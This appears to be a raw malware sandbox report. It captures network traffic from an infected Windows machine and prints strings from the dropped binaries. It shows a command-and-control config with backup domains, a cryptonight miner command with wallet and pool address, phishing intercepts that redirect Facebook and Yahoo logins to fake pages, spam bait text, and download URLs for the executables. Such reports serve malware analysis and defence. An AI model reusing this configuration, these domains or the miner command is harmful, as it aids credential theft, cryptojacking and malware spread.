......4..~...\?D...[Y.yH...i^x....<".{;..P..S.a4.b..F...P.s.....6..
K...W..G...c..n..J.g). U.D......!..........T}.yI.2..0...([. .........v
.a..............N/.......5. .9Y........v.Y."........;........O......}z
./Z.....dY....M...a.k...d..%.u. (..I.%1Khc....'...;j|.qV..g...!J{5.q..
..|....e....B..k.iz..Fp>.....& ..I_..;.:...D...C.X.;v...)..t.c...Z.
 v.J..a..E.O#6h..4x..b.!...9V.....Ok.$.TQ.<..\"....Gs......;.X@9?JT
h...<_..N...q( ..B^o?r...H........~....4._....."jj<..,.....n....
f.S.u...oa:.......0QA...j.P.o~...^....?..h"Um..t.......V\.d..S.!.k.. .
..b.%1..{.|G.y.L.U..q.#..'..$./:8......K....m.R.....tl..}.|...9..D...X
..]...2..*?.9..k#....8<.._..#[7...&.....i..J....:..r.\ ....K.....T.
1;.9....IEND.B`.....


GET /_images/header_upgrade.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 946

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3b2"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...TIDATx...[H.a..=.v.0..1...m9"6..]t1.]L.b7.D..b.caE7!...1F.......
.h0LX..2....n...H..sf....(l.....|...~.....>.Ae.b1.Y6...[. .p....^..
.......)t.?.(..'.....~.....C......E...._....?...v..O....(.x.]h;.-.a6.o
a.<..Hz.q......%....! !...Ry.|~..W2.@........"......c...0Np....Q..D
VVV...."=C.......TS......?!... *2..da.H...S.g.....l[KKK.....)..<*..
....*....@%N$.....("9 ..Dfff.........GGG.I...s.3.....iW....H$...e.....
.o.......k....v../...j\((((K.....6%M..|..V.}1<<[email protected]`
<...h~~./T.'...)...^OO...F..`VWW.....###O...#...........5...000...T
.......G...."..E.nll...v..."../......DV.U.V._)....h.......d....]@0UUU.
..C-...T.........p.D8..CH.R..b..R.........k4..z.....D.....!p.....\...$
..g......T*.K,..J...\..=?..4..C..........{."...0N...h.e.544.`..8....._
.....|...C.~iOp.Dtc3......g.Q..<..d...n[[..........\WWG....{.L....q
.. ..;.....\.;..<....P....9...g.....~.0.k. ...X.....IEND.B`...

GET /dep/dropbox.zip HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 20 May 2014 22:57:46 GMT

Accept-Ranges: bytes

Content-Length: 6978685

Content-Type: application/zip

Age: 0

Server: YTS/1.20.28
PK.........}}C..CR............clientutils.js.=kw..... 4|. !.Er........
...8....i.a:i....6....5....lUI.......=w9qL..R.T/.J..........s.0G0.y..s
c....E..N.d.?`.S....o.:4.6....q/..M6..ysg.&H.E..nv.Z..}..~.l2..j7N8]..
.?.....F...#.....i.*v.........Y..}......c-.P.......&.E`sf.c....../....
xv.Y.............3Z..B..:.9B ...T..%....|\c..s...Z.......K.#.......9..
....H`.p...?..........X.....d....U.EV....j..AWcn......o...._.,...c#..T
....1..]g..N..@ .....0....f....oN../F.#.56v.$...,.......h..Dp.E ......
X.ACGs$n..E].M...E@...\.E.A....} .....!. .........q...DS....[#....$'x~
.XKTpF..L.Wbj..F\.......J.,@4D....d......Xs.........V..:.v.......Y.5..
R....O{.C.5....#...V.#...=.....~{0@P.>.._.u.P....].w...........yg.p
.=.SA.......?:.....Yg..f..3..dv.p[....v...Z}[email protected].'}..}.....1.
..;x`......d..... .G.......Cv.;;nC..6..z{.......Z...;n..~mS..@.#4.).d.
O.X..........x.z.a..k0..0j..3h.X.....4.~.:A.B..........OO.T...A;..q.u.
...>Y_M...g;.o\.d!.x.w.....9..G..5R8g D5.Ho..a..d...VT.*...ue.$.Iq.
.>."U.n....{.t[&K*..8Q..O.C.#..;..............T.A.....l.Y........)w
Qt...N....$v.>.(.<.,.....u.R.r.....U.......-.{.g#. zuk..mk.~....
.............=:n..z......n..?.......>..5..|r3u>.qg.?.G .........
.4^...O...S:4.r.N...m....D...r..=?...^.g....^..W.....W...~..??.......l
.......\.p..e...\.p..e.w...A.=......iX{.f...A.=h..m...>...6..f.`...
..}.......>.:.X.P~.......:[email protected]@[email protected]@[email protected]@.W.
...^..j.-...........3Pl......6..U...\c....N..J..D.._.(..JN........ph.U
.`.Q!.....o..k%......9.....\ythN.E.@[..?..%*T.g.8_.T."........1.u.
<<< skipped >>>

GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:37 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
ping.5.FLAG cfg.215."saltsecond.net" "deadtomorrow.net" "ringfirst.net
" "westweight.net" "watchstand.net" "signarmy.net" "pointdeal.net" "ro
ckknew.net" "hangclock.net" "wifeknew.net" "spendstudy.net" "southbloo
d.net" "lasopeidres.com" var_user_ip.763.%kill_jhminer% = "1";.%invite
_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.e
bay.com/chat.php?id=4094&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1"
;.ëaylive% = "middleevery.net";.%set_intercepts% = ""VVV.facebook.co
m" "middleevery.net" "/fb_login/" "/login/" "1" "facebook.com" "middle
every.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "middleevery.ne
t" "/yahoo/" "/config/" "0" ";.Þp_host% = "middleevery.net";.Þp_pa
th% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU";.
%cpuinfo% = "Intel(R) Atom(TM) CPU D525 @ 1.80GHz (1800 MHz)";.%send_l
ibpurple_spam% = "[email protected]
123.Vreau sa postez pozele astea, crezi ca e ok? %dropbox_link%.zip.2.
23364.20..";.%newport% = "48744";.plugin.54656.miner_forced.183.win32m
rocli2.exe -a cryptonight -a cryptonight -o stratum tcp://minin.gs:177
77 -u 1VJruexZzXuRos1tWixCqQ4P7NW8V7qGCYKuRbzXcJz2iixiSzbz837SR4hJBZPo
Qj1iJtbeKTrek2bXNttF6dgAN6Bjjbx -p x.MZ......................@........
.......................................!..L.!This program cannot be ru
n in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4.
..4...4...4...4...4...4...4Rich...4................PE..L......S.......
..............N......5.............@..............................
<<< skipped >>>

GET /fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 248195

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364176002,173213213*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["PIiAz"]); }..__d("EmuController",["AsyncRequest","DataStore","U
RI","$","copyProperties","emptyFunction","ge","goURI"],function(a,b,c,
d,e,f){var g=b('AsyncRequest'),h=b('DataStore'),i=b('URI'),j=b('$'),k=
b('copyProperties'),l=b('emptyFunction'),m=b('ge'),n=b('goURI');functi
on o(p,q){this.impression=q;this.containerId=p;h.set(j(p),'emuControll
er',this);return this;}k(o,{fromContainer:function(p){var q=m(p);if(!q
)return null;return h.get(q,'emuController');},getEventClass:function(
p){return "emuEvent" String(p).trim();}});k(o.prototype,{EVENT_HANDLER
_PATH:'/ajax/emu/end.php',CLICK:1,FAN:"fad_fan",FOLLOW:"fad_follow",ev
ent:function(p,q,r,s){var t={eid:this.impression,f:0,ui:this.container
Id,en:p,a:1};if(q)t.ed=JSON.stringify(q);if(!s)s=l;var u=new g().setUR
I(this.EVENT_HANDLER_PATH).setData(t).setErrorHandler(s);if(r)u.setHan
dler(r);u.send();},redirect:function(){var p={eid:this.impression,f:0,
ui:this.containerId,en:this.CLICK,a:0,sig:Math.floor(Math.random()*655
35) 65536},q=new i(this.EVENT_HANDLER_PATH);q.setQueryData(p);n(q);}})
;e.exports=o;});.__d("legacy:ad-units-base-js",["EmuController"],funct
ion(a,b,c,d){a.EmuController=b('EmuController');},3);.__d("BassWhitesp
aceListener",["Bootloader","Event","Parent","copyProperties","goURI"],
function(a,b,c,d,e,f){var g=b('Bootloader'),h=b('Event'),i=b('Parent')
,j=b('copyProperties'),k=b('goURI');function l(m,n){this.link=n;h.list
en(m,'click',this.onclicked.bind(this));}j(l.prototype,{onclicked:
<<< skipped >>>

GET /dep/zip.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:07 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 20 May 2014 22:57:38 GMT

Accept-Ranges: bytes

Content-Length: 290816

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM
.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM..
..............PE..L.....xH................. [email protected]....@.
.........................p............................................
..XH..P....`.. .......................................................
.....................0...............................text............ 
.................. ..`.rdata..."...0...0...0..............@[email protected]...
.....`.......`[email protected]... ....`.......`..............@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /fb_login/index_files/xgsOhvNndM-.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT

Accept-Ranges: bytes

Content-Length: 39059

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364239754,178142531*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["FdcP\/"]); }..__d("ad-logging",["Arbiter","AsyncRequest","Banza
i","collectDataAttributes","Parent","UFITrackingNodes"],function(a,b,c
,d,e,f){var g='ssinfeed',h=b('Arbiter'),i=b('AsyncRequest'),j=b('Banza
i'),k=b('collectDataAttributes'),l=b('Parent'),m=b('UFITrackingNodes')
,n={};function o(r){return (r.getAttribute&&(r.getAttribute('ajaxify')
||r.getAttribute('data-endpoint'))||r.action||r.href||r.name);}functio
n p(r){var s=r.ei||r.ai;if(!s&&r.mei)s=r.mf_story_key||r.mk;if(r!==nul
l&&typeof(s)==="string"){if(r.tn){var t=r.tn.charAt(0),u=m.decodeTrack
ingInfo(t);if((u==m.types.LIKE_LINK)||(u==m.types.UNLIKE_LINK)||(u==m.
types.COMMENT)||(u==m.types.ADD_COMMENT_BOX)||(u==m.types.SHARE_LINK))
return;}var v=Date.now(),w=500;r.duplicate_click=!!n[s]&&(v-n[s]<w)
;n[s]=v;if(j.isEnabled('ssinfeed')){j.post(g,r,{delay:0,retry:j.isEnab
led('ssinfeed_retry')});}else new i('/ajax/ssinfeed/end/').setData(r).
setAllowCrossPageTransition(true).setMethod('POST').send();}}function 
q(r,s){if(!s.node)return;var t=o(s.node),u=l.byTag(s.node,'input')||l.
byTag(s.node,'button');if(!t&&u&&u.type=="submit"&&u.getAttribute&&u.g
etAttribute('data-ft'))t="#";var v;if(t&&s.event&&(s.event.type==='cli
ck'||s.event.type==='contextmenu')){v=k(s.node,['ft']);v.ft.href=t;v.f
t.mouse_type=s.event.type;p(v.ft);}}h.subscribe("ClickRefAction/new",q
);});.__d("CalendarUI",["Event","Arbiter","AsyncRequest","CSS","DOM","
DOMQuery","DOMScroll","Hovercard","Parent","Run","ScrollAwareDOM",
<<< skipped >>>

GET /fb_login/index_files/VYqjPg0eFkT.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 130667

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364177030,178142509*/..._4-do{text-align:center}.._4-dp{font-size:2
4px;line-height:28px;margin:40px 0 20px}.._4-dq{font-size:16px;line-he
ight:20px;margin:20px 0}.._4-dr{font-size:12px;line-height:20px}..fbFo
rBusinessWrapper{margin:0 auto;width:980px}..fbForBusinessContent{bord
er-bottom:1px solid #f2f2f2;position:relative}..fbForBusinessNoBorder{
border-bottom:none}..fbForBusinessRightCol img{background-color:#ccc;b
order:5px solid #f9f9f9;float:right;padding:1px}..fbBusinessHomeVideo{
background-color:#fff;border:1px solid #ccc}..fbForBusinessContent img
,..fbForBusinessFloatedLeft{display:block;float:left}..fbForBusinessPa
geHeader{margin-top:40px}..fbForBusinessHomePageHeaderText{margin-top:
50px}..fbMarketingMenu{list-style:none;margin:0 0 20px 0;padding:0}..f
bMarketingMenu a{border-top:1px solid #e5e5e5;display:block;font-size:
13px}..fbForBusinessMenuLast a{border-bottom:1px solid #e5e5e5}..fbMar
ketingMenu a.currentPage,..fbMarketingMenu a:hover{background:#f9f9f9 
url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yE/r/JQgQHls27pw.png) 
no-repeat center right;text-decoration:none}..fbForBusinessHelpfulLink
s ul{list-style:none;margin-left:0;padding-left:0}..fbForBusinessHelpf
ulLinks ul li{font-size:11px;line-height:1.5}..fbForBusinessHelpfulLin
ks div{color:#666;font-size:11px}..fbForBusinessTip{background:#f9f9f9
 url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/qt94E91uvnk.png)
 no-repeat 15px 10px;border:1px solid #ccc;padding-left:40px}..fbForBu
sinessList li div{color:#999;font-size:15px;line-height:20px}..fbF
<<< skipped >>>

GET /dep/win64mrocli2.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Sat, 24 May 2014 21:17:40 GMT

Accept-Ranges: bytes

Content-Length: 2954752

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...w..S
.................."...-..\............@...............................
-.......-...............................................-...... -.d$..
..........*.p"...........p-.PG.......................... `-.(.........
...........(-.X............................text.....".......".........
........`.p`.data........."......."[email protected]........#...
....#.............@.`@.pdata..p"....*..$...r*[email protected]@.xdata..
...... ....... .............@.@@.bss.....[....,.......................
`..edata........-.......,[email protected]@.idata..d$... -..&....,.....
[email protected].......,.............@[email protected]....`-...
....,.............@.`..reloc..PG...p-..H....,[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ....,.........,.........,.........,.....tg....,.....,...tH.......
.".H........]".....,.H....,.H....,.H....-.....b"..=h.#..tf1.H..(......
..."......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...b"...b".1.H..(..zt...,.........1............H.
.8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.
........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=..-..........H9...'..........H...H...|.,.H..u...y.,.1........
<<< skipped >>>

GET /fb_login/index_files/lV3BV1YRc-7.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 71231

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364175964,173217823*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["kQ5UI"]); }..__d("PHPQuerySerializer",[],function(a,b,c,d,e,f){
function g(n){return h(n,null);}function h(n,o){o=o||'';var p=[];if(n=
==null||n===undefined){p.push(i(o));}else if(n instanceof Array){for(v
ar q=0;q<n.length;  q)if(n[q]!==undefined)p.push(h(n[q],o?(o '[' q 
']'):q));}else if(typeof(n)=='object'){for(var r in n)if(n[r]!==undefi
ned)p.push(h(n[r],o?(o '[' r ']'):r));}else p.push(i(o) '=' i(n));retu
rn p.join('&');}function i(n){return encodeURIComponent(n).replace(/%5
D/g,"]").replace(/[/g,"[");}var j=/^(\w )((?:\[\w*\]) )=?(.*)/;funct
ion k(n){if(!n)return {};var o={};n=n.replace(/[/ig,'[').replace(/%5
D/ig,']');n=n.split('&');var p=Object.prototype.hasOwnProperty;for(var
 q=0,r=n.length;q<r;q  ){var s=n[q].match(j);if(!s){var t=n[q].spli
t('=');o[l(t[0])]=t[1]===undefined?null:l(t[1]);}else{var u=s[2].split
(/\]\[|\[|\]/).slice(0,-1),v=s[1],w=l(s[3]||'');u[0]=v;var x=o;for(var
 y=0;y<u.length-1;y  )if(u[y]){if(!p.call(x,u[y])){var z=u[y 1]&&!u
[y 1].match(/^\d $/)?{}:[];x[u[y]]=z;if(x[u[y]]!==z)return o;}x=x[u[y]
];}else{if(u[y 1]&&!u[y 1].match(/^\d $/)){x.push({});}else x.push([])
;x=x[x.length-1];}if(x instanceof Array&&u[u.length-1]===''){x.push(w)
;}else x[u[u.length-1]]=w;}}return o;}function l(n){return decodeURICo
mponent(n.replace(/\ /g,' '));}var m={serialize:g,encodeComponent:i,de
serialize:k,decodeComponent:l};e.exports=m;});.__d("URIBase",["copyPro
perties","PHPQuerySerializer"],function(a,b,c,d,e,f){var g=b('copy
<<< skipped >>>

The Malware connects to the servers at the folowing location(s):

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

YrR.Vf

-.pX>

SSSh0

SPSSSh

SSShp/C

tFSSSh

t)SSShP

SSShP

SSShp

SSShp&C

t\SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

unovkkdak.exe

zj.exe

eityzygishyx.exe

o8.OLnzG

.LlqI

Y:\Bp

%s _\(

?_.eg]

Ì>$

By.Ix

j.mSd

%u 0a

zcÁ

%Documents and Settings%\LocalService

|%System%\eityzygishyx.exe

|wellshirt.net

WATCHDOGPROC "c:\windows\system32\unovkkdak.exe"

%System%\unovkkdak.exe

mscoree.dll

KERNEL32.DLL

eityzygishyx.exe_4936:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

YrR.Vf

-.pX>

SSSh0

SPSSSh

SSShp/C

tFSSSh

t)SSShP

SSShP

SSShp

SSShp&C

t\SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

unovkkdak.exe

zj.exe

eityzygishyx.exe

o8.OLnzG

.LlqI

Y:\Bp

%s _\(

?_.eg]

Ì>$

By.Ix

j.mSd

%u 0a

zcÁ

%Documents and Settings%\LocalService

%System%\eityzygishyx.exe

mscoree.dll

KERNEL32.DLL

win32mrocli2.exe_428:

.text

p`.data

.rdata

`@.bss

.idata

\\\\5\\\\

|$\3|$81

\$\3\$`3

""""%""""1

1|$,1\$,

|$@3\$,3\$0

\$$!|$$!

|$ 1|$41

\$0#\$(1

\$\3\$ 1|$(

\$43\$01

\$ 3\$41

1\$,1|$,

\$ 3\$(3\$8

|$03|$43|$@

|$,3|$83|$ 3|$

|$4#|$(3<$

%UUUU

L$p%UUUU

|$43|$<1

SHA256 block transform for x86, CRYPTOGAMS by 

libgcj-13.dll

accepted: %lu/%lu (%.2f%%), %.2f H/s at diff %g %s

accepted: %lu/%lu (%.2f%%), %s khash/s %s

DEBUG: reject reason: %s

DEBUG: job_id='%s' extranonce2=%s ntime=x

{"method": "getjob", "params": {"id": "%s"}, "id":1}

JSON decode of %s failed

http://

https://

stratum tcp://

http://%s

cpuminer 2.3.3

Starting Stratum on %s

...terminating workio thread

...retry after %d seconds

JSON decode failed(%d): %s

Binding thread %d to cpu %d

thread %d: %lu hashes, %.2f H/s

thread %d: %lu hashes, %.2f khash/s

Total: %s H/s

Total: %s khash/s

work retrieval failed, exiting mining thread %d

JSON key '%s' not found

JSON key '%s' is not a string

Auth id: %s

JSON returned status "%s"

{"method": "login", "params": {"login": "%s", "pass": "%s", "agent": "cpuminer-multi/0.1"}, "id": 1}

DEBUG: authenticated in %d ms

json_rpc2.0 error: %s

CURL initialization failed

%s%s%s

Long-polling activated for %s

{"method": "submit", "params": {"id": "%s", "job_id": "%s", "nonce": "%s", "result": "%s"}, "id":1}

{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}

{"method": "getwork", "params": [ "%s" ], "id":1}

getwork failed, retry after %d seconds

DEBUG: got new work in %d ms

%s: unsupported non-option argument '%s'

JSON option %s invalid

%s: no URL supplied

%s:%s

https:

thread %d create failed

%d miner threads started, using '%s' algorithm.

cert

userpass

[%d-d-d d:d:d] %s

User-Agent: cpuminer/2.3.3

HTTP request failed: %s

JSON-RPC call failed: %s

hex2bin failed on '%s'

DEBUG: %s

Hash: %s

Target: %s

http%s

Stratum connection failed: %s

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3", "%s"]}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.3"]}

mining.notify

Stratum session id: %s

mining.set_difficulty

client.reconnect

stratum tcp://%s:%d

Ignoring request to reconnect to %s

Server requested reconnection to %s

client.get_version

cpuminer/2.3.3

client.show_message

MESSAGE FROM SERVER: %s

{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}

tXXFr.rh.44Aw-wl-66

r.rh.44Fw-wl-66A

.rh.44Fr-wl-66Aw

O9K\9..eKW

trh.44Fr.wl-66Aw-

K\9..eK9

h.44Fr.rl-66Aw-w

O\9..eK9K=W

.44Fr.rh-66Aw-wl

9..eK9K\W

t44Fr.rh.66Aw-wl-

..eK9K\9

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

:x

:,7.35.0

smtp

tftp

getpeername() failed with errno %d: %s

getsockname() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Could not set TCP_NODELAY: %s

TCP_NODELAY set

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Local Interface %s is ip %s using address family %i

Name '%s' family %i resolved to '%s' family %i

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

Immediate connect fail for %s: %s

Couldn't bind to '%s'

connect to %s port %ld failed: %s

Failed to connect to %s port %ld: %s

[%s %s %s]

Send failure: %s

Recv failure: %s

Write callback asked for PAUSE when not supported!

%s:%d

Hostname was %sfound in DNS cache

timeout on name lookup is not supported

%5[^:]:%d:%5s

Resolve %s found illegal!

Added %s:%d:%s to DNS cache

IDN support not present, can't parse Unicode domains

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

Connected to %s (%s) port %ld (#%ld)

User-Agent: %s

[^:]:%[^

:]://%[^

 malformed

SMTP.

Rebuilt URL to: %s

Protocol %s not supported or disabled in libcurl

%s://%s

http_proxy

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number too large: %lu

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Found bundle for host %s: %p

Server doesn't support pipelining

Found connection %ld, with requests in the pipe (%zu)

Re-using existing connection! (#%ld) with host %s

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

Connection #%ld to host %s left intact

Curl_poll(%d ds, %d ms)

Internal error clearing splay node = %d

Internal error removing splay node = %d

Pipe broke: handle 0x%p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received

Operation timed out after %ld milliseconds with %I64d bytes received

#HttpOnly_

23[^;

=]=I99[^;

httponly

skipped cookie with bad tailmatch domain: %s

%s cookie %s="%s" for domain %s, path %s, expire %I64d

# Netscape HTTP Cookie File

# http://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

%d.%d.%d.%d

CURLSHcode unknown

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

Please call curl_multi_perform() soon

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: weird server reply

FTP: The server failed to connect to data port

FTP: unknown PASS reply

FTP: Accepting server connect has timed out

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

Login denied

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

